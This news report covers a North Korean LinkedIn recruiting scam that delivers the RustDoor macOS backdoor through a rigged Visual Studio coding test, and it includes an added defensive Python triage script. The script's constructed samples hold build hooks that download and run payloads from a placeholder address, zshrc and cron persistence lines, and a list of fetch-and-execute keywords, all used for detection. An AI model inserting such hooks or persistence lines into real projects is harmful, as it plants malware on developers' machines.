
North Korean Hackers Target Cryptocurrency Users on LinkedIn with RustDoor Malware

Cybersecurity researchers are continuing to warn about North Korean threat actors' efforts to target prospective victims on LinkedIn in order to deploy malware dubbed RustDoor.

The latest warning comes from Jamf Threat Labs, which said it identified an attack attempt in which a user was contacted on the professional social network by someone posing as a recruiter for a legitimate decentralized cryptocurrency exchange (DEX) named STON.fi.

The malicious activity is part of a multi-pronged campaign by cyber threat actors backed by the Democratic People's Republic of Korea (DPRK) to infiltrate networks of interest under the pretext of conducting interviews or coding assignments.

The financial and cryptocurrency sectors are among the top targets for these state-sponsored adversaries, who seek to generate illicit revenue and meet an ever-evolving set of objectives driven by the regime's priorities.

These attacks take the form of "highly tailored, difficult-to-detect social engineering campaigns" directed against employees of decentralized finance (DeFi), cryptocurrency, and similar businesses, as the U.S. Federal Bureau of Investigation (FBI) recently emphasized in an alert.

One of the telltale signs of North Korean social engineering activity is a request to run code or download applications on company-owned devices, or on devices that have access to a company's internal network.

Another indicator is that such attacks also involve "requests to conduct a 'pre-employment test' or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories."

Incidents using similar approaches have been reported repeatedly in recent weeks, pointing to a continual evolution of the tooling used in these campaigns.

The latest attack chain identified by Jamf involves tricking the victim into downloading a booby-trapped Visual Studio project as part of a purported coding challenge. The project embeds bash commands that download two separate second-stage payloads ("VisualStudioHelper" and "zsh_env") with identical functionality.

The second-stage malware is RustDoor, which Jamf tracks as Thiefbucket. At the time of writing, none of the anti-malware engines on VirusTotal flag the zipped coding test file as malicious; it was uploaded to the platform on August 7, 2024.

"The config files embedded within the two separate malware samples show that the VisualStudioHelper will persist via cron while zsh_env will persist via the zshrc file," researchers Jaron Bradley and Ferdous Saljooki wrote.
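The two stages described above (a build hook that fetches and runs a payload, then persistence through cron and the user's zshrc) are each easy to check for before a "coding test" is opened or after it has been run. The script below is an added example written for this article, not Jamf's tooling, and it makes two labelled assumptions: that the project file is MSBuild-style XML (a .csproj, whose PreBuildEvent/PostBuildEvent properties and Exec tasks can run shell commands; the article does not say which hook the real lure used), and that persistence is audited by reading the text of ~/.zshrc and the user's crontab. The sample project, zshrc and crontab are constructed, and 198.51.100.10 is a documentation address, not an indicator from the campaign.

```python
"""Triage helpers for a 'coding challenge' lure: find build hooks that fetch or
execute code, and find cron/zshrc entries that run binaries from temp or hidden
directories. Added example, not Jamf's code; see the assumptions in the comments."""
import re
import xml.etree.ElementTree as ET

# Commands a legitimate build hook rarely needs but a dropper always does.
FETCH_OR_EXEC = re.compile(r"\b(curl|wget|bash|zsh|osascript|base64|eval|nohup)\b|\bsh\s+-c\b")
# Payload names reported for this campaign (from the article).
KNOWN_NAMES = ("VisualStudioHelper", "zsh_env")
# Executables launched from temp locations or from a dot-directory.
TEMP_DIR = re.compile(r"(?:^|[\s\"'=])(/tmp/|/private/tmp/|/var/folders/)")
HIDDEN_DIR = re.compile(r"/\.([A-Za-z0-9_-]+)/")
# Dot-directories common developer tooling legitimately sources from; tune per fleet.
HIDDEN_ALLOW = {"nvm", "cargo", "rustup", "pyenv", "rbenv", "oh-my-zsh"}


def scan_build_hooks(project_xml: str) -> list[tuple[str, str]]:
    """Return (hook, command) for MSBuild build events or <Exec> tasks that fetch
    or execute code. Assumption: a .csproj-style project; other project formats
    keep their hooks elsewhere (e.g. Xcode run-script phases)."""
    root = ET.fromstring(project_xml)
    hits = []
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1]  # drop any XML namespace prefix
        if tag in ("PreBuildEvent", "PostBuildEvent"):
            cmd = (el.text or "").strip()
        elif tag == "Exec":
            cmd = el.get("Command", "").strip()
        else:
            continue
        if FETCH_OR_EXEC.search(cmd):
            hits.append((tag, cmd))
    return hits


def scan_persistence(zshrc: str, crontab: str) -> list[tuple[str, str, str]]:
    """Return (source, reason, line) for zshrc or crontab entries that look like the
    persistence described above. Heuristic: known payload names, anything run from a
    temp directory, or anything run from a non-allowlisted dot-directory."""
    hits = []
    for source, text in (("zshrc", zshrc), ("crontab", crontab)):
        for raw in text.splitlines():
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            if any(name in line for name in KNOWN_NAMES):
                hits.append((source, "known-sample-name", line))
            elif TEMP_DIR.search(line):
                hits.append((source, "exec-from-temp-dir", line))
            elif any(d not in HIDDEN_ALLOW for d in HIDDEN_DIR.findall(line)):
                hits.append((source, "exec-from-hidden-dir", line))
    return hits


# Constructed samples (not the real lure). 198.51.100.10 is a documentation address.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
    <PreBuildEvent>curl -s http://198.51.100.10/VisualStudioHelper -o /tmp/VisualStudioHelper &amp;&amp; /tmp/VisualStudioHelper &amp;</PreBuildEvent>
  </PropertyGroup>
  <Target Name="Prep" BeforeTargets="Build">
    <Exec Command="zsh -c 'curl -s http://198.51.100.10/zsh_env -o $HOME/.zsh_env; echo source ~/.zsh_env &gt;&gt; ~/.zshrc'" />
  </Target>
</Project>
"""

SAMPLE_ZSHRC = """export PATH="$HOME/bin:$PATH"
source ~/.nvm/nvm.sh
alias ll='ls -la'
nohup "$HOME/Library/Application Support/.vshelper/helper" >/dev/null 2>&1 &
"""

SAMPLE_CRONTAB = """0 9 * * 1 /usr/local/bin/backup.sh
*/10 * * * * /tmp/VisualStudioHelper
@reboot /var/folders/q1/abc123/T/updater >/dev/null 2>&1
"""

if __name__ == "__main__":
    for hook, cmd in scan_build_hooks(SAMPLE_CSPROJ):
        print(f"[build hook] {hook}: {cmd}")
    for source, reason, line in scan_persistence(SAMPLE_ZSHRC, SAMPLE_CRONTAB):
        print(f"[persistence] {source} ({reason}): {line}")
```

On a real host, feed `scan_persistence` the contents of `~/.zshrc` (and `~/.zshenv`, `~/.zprofile`) and the output of `crontab -l`; the hidden-directory rule will need its allowlist tuned to whatever developer tooling the fleet uses, and a clean result does not rule out other persistence mechanisms (LaunchAgents, login items) that the article does not mention for these samples.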

RustDoor, a macOS backdoor, was first documented by Bitdefender in February 2024 in connection with a malware campaign targeting cryptocurrency businesses. Subsequent analysis by S2W uncovered a Golang variant named GateDoor that is designed to attack Windows machines.

The findings from Jamf are significant, not only because they mark the first time the malware has been formally attributed to North Korean threat actors, but also because the malware is written in Objective-C.

"The tactics and techniques used [in the campaign] correlate very closely to what the FBI as well as many others in the industry are seeing," Jaron Bradley, Director at Jamf Threat Labs, told The Hacker News.

"Much of the targets, techniques, and objectives of the discussed attack align closely to other cyber activity coming from the DPRK over the past couple years (Operation Dream Job, RustBucket)."

VisualStudioHelper is also designed to act as an information stealer, collecting files specified in its configuration, but only after prompting the user to enter their system password. The prompt is disguised as if it originates from the Visual Studio application so as not to raise suspicion.

Both payloads, however, function as a backdoor and use two different servers for command-and-control (C2) communications.

"Threat actors continue to remain vigilant in finding new ways to pursue those in the crypto industry," the researchers stated. "It's crucial to teach your personnel, particularly your engineers, to be wary of trusting folks who connect on social media and encourage consumers to execute software of any form.

"These social engineering schemes performed by the DPRK come from those who are well-versed in English and enter the conversation having well researched their target."

(The article was modified after publication to incorporate further replies from Jamf.)
